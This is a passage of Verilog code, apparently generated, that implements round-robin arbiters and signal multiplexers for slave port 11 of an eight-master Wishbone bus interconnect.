                    if ( s11_msel_arb2_req[6] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[7] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[0] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[1] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[2] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[3] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant5:
        begin
            if (  !( s11_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[6] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[7] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[0] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[1] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[2] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[3] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[4] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant6:
        begin
            if (  !( s11_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[7] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[0] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[1] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[2] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[3] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[4] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[5] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb2_grant7:
        begin
            if (  !( s11_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s11_msel_arb2_req[0] ) 
                begin
                    s11_msel_arb2_next_state = s11_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s11_msel_arb2_req[1] ) 
                    begin
                        s11_msel_arb2_next_state = s11_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s11_msel_arb2_req[2] ) 
                        begin
                            s11_msel_arb2_next_state = s11_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s11_msel_arb2_req[3] ) 
                            begin
                                s11_msel_arb2_next_state = s11_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s11_msel_arb2_req[4] ) 
                                begin
                                    s11_msel_arb2_next_state = s11_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb2_req[5] ) 
                                    begin
                                        s11_msel_arb2_next_state = s11_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb2_req[6] ) 
                                        begin
                                            s11_msel_arb2_next_state = s11_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s11_msel_arb3_req = { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd3 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd3 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd3 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd3 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd3 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd3 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd3 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s11_msel_arb3_state <= s11_msel_arb3_grant0;
        end
        else
        begin 
            s11_msel_arb3_state <= s11_msel_arb3_next_state;
        end
    end
    always @ (  s11_msel_arb3_state or  { ( s11_msel_req[7] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[15] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[14] ) ) } == 2'd3 ) ), ( s11_msel_req[6] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[13] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[12] ) ) } == 2'd3 ) ), ( s11_msel_req[5] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[11] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[10] ) ) } == 2'd3 ) ), ( s11_msel_req[4] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[9] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[8] ) ) } == 2'd3 ) ), ( s11_msel_req[3] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) } == 2'd3 ) ), ( s11_msel_req[2] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'd3 ) ), ( s11_msel_req[1] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'd3 ) ), ( s11_msel_req[0] & ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s11_msel_arb3_next_state = s11_msel_arb3_state;
        case ( s11_msel_arb3_state ) 
        s11_msel_arb3_grant0:
        begin
            if (  !( s11_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[1] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[2] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[3] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[4] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[5] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[6] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[7] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant1:
        begin
            if (  !( s11_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[2] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[3] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[4] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[5] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[6] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[7] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[0] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant2:
        begin
            if (  !( s11_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[3] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[4] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[5] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[6] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[7] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[0] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[1] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant3:
        begin
            if (  !( s11_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[4] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[5] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[6] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[7] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[0] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[1] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[2] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant4:
        begin
            if (  !( s11_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[5] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[6] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[7] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[0] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[1] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[2] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[3] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant5:
        begin
            if (  !( s11_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[6] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[7] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[0] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[1] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[2] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[3] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[4] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant6:
        begin
            if (  !( s11_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[7] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[0] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[1] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[2] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[3] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[4] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[5] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_msel_arb3_grant7:
        begin
            if (  !( s11_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s11_msel_arb3_req[0] ) 
                begin
                    s11_msel_arb3_next_state = s11_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s11_msel_arb3_req[1] ) 
                    begin
                        s11_msel_arb3_next_state = s11_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s11_msel_arb3_req[2] ) 
                        begin
                            s11_msel_arb3_next_state = s11_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s11_msel_arb3_req[3] ) 
                            begin
                                s11_msel_arb3_next_state = s11_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s11_msel_arb3_req[4] ) 
                                begin
                                    s11_msel_arb3_next_state = s11_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s11_msel_arb3_req[5] ) 
                                    begin
                                        s11_msel_arb3_next_state = s11_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s11_msel_arb3_req[6] ) 
                                        begin
                                            s11_msel_arb3_next_state = s11_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s11_msel_pri_out or  s11_msel_arb0_state or  s11_msel_arb1_state)
    begin
        if ( s11_msel_pri_out[0] ) 
        begin
            s11_msel_sel1 = s11_msel_arb1_state;
        end
        else
        begin 
            s11_msel_sel1 = s11_msel_arb0_state;
        end
    end
    always @ (  s11_msel_pri_out or  s11_msel_arb0_state or  s11_msel_arb1_state or  s11_msel_arb2_state or  s11_msel_arb3_state)
    begin
        case ( s11_msel_pri_out ) 
        2'd0:
        begin
            s11_msel_sel2 = s11_msel_arb0_state;
        end
        2'd1:
        begin
            s11_msel_sel2 = s11_msel_arb1_state;
        end
        2'd2:
        begin
            s11_msel_sel2 = s11_msel_arb2_state;
        end
        2'd3:
        begin
            s11_msel_sel2 = s11_msel_arb3_state;
        end
        endcase
    end
    assign s11_mast_sel = ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s11_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s11_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s11_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s11_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s11_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s11_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s11_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s11_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s11_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s11_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s11_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s11_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s11_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s11_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s11_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s11_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s11_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s11_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s11_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s11_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s11_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s11_m0_data_o = s11_data_i;
    assign s11_m1_data_o = s11_data_i;
    assign s11_m2_data_o = s11_data_i;
    assign s11_m3_data_o = s11_data_i;
    assign s11_m4_data_o = s11_data_i;
    assign s11_m5_data_o = s11_data_i;
    assign s11_m6_data_o = s11_data_i;
    assign s11_m7_data_o = s11_data_i;
    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s11_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s11_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s11_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s11_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s11_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s11_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s11_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s11_m0_cyc_r <= m0_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m1_cyc_r <= m1_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m2_cyc_r <= m2_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m3_cyc_r <= m3_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m4_cyc_r <= m4_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m5_cyc_r <= m5_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m6_cyc_r <= m6_s11_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s11_m7_cyc_r <= m7_s11_cyc_o;
    end
    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  m0_s11_cyc_o or  m1_s11_cyc_o or  m2_s11_cyc_o or  m3_s11_cyc_o or  m4_s11_cyc_o or  m5_s11_cyc_o or  m6_s11_cyc_o or  m7_s11_cyc_o or  s11_m0_cyc_r or  s11_m1_cyc_r or  s11_m2_cyc_r or  s11_m3_cyc_r or  s11_m4_cyc_r or  s11_m5_cyc_r or  s11_m6_cyc_r or  s11_m7_cyc_r)
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_cyc_o = ( m0_s11_cyc_o & s11_m0_cyc_r );
        end
        3'd1:
        begin
            s11_wb_cyc_o = ( m1_s11_cyc_o & s11_m1_cyc_r );
        end
        3'd2:
        begin
            s11_wb_cyc_o = ( m2_s11_cyc_o & s11_m2_cyc_r );
        end
        3'd3:
        begin
            s11_wb_cyc_o = ( m3_s11_cyc_o & s11_m3_cyc_r );
        end
        3'd4:
        begin
            s11_wb_cyc_o = ( m4_s11_cyc_o & s11_m4_cyc_r );
        end
        3'd5:
        begin
            s11_wb_cyc_o = ( m5_s11_cyc_o & s11_m5_cyc_r );
        end
        3'd6:
        begin
            s11_wb_cyc_o = ( m6_s11_cyc_o & s11_m6_cyc_r );
        end
        3'd7:
        begin
            s11_wb_cyc_o = ( m7_s11_cyc_o & s11_m7_cyc_r );
        end
        endcase
    end
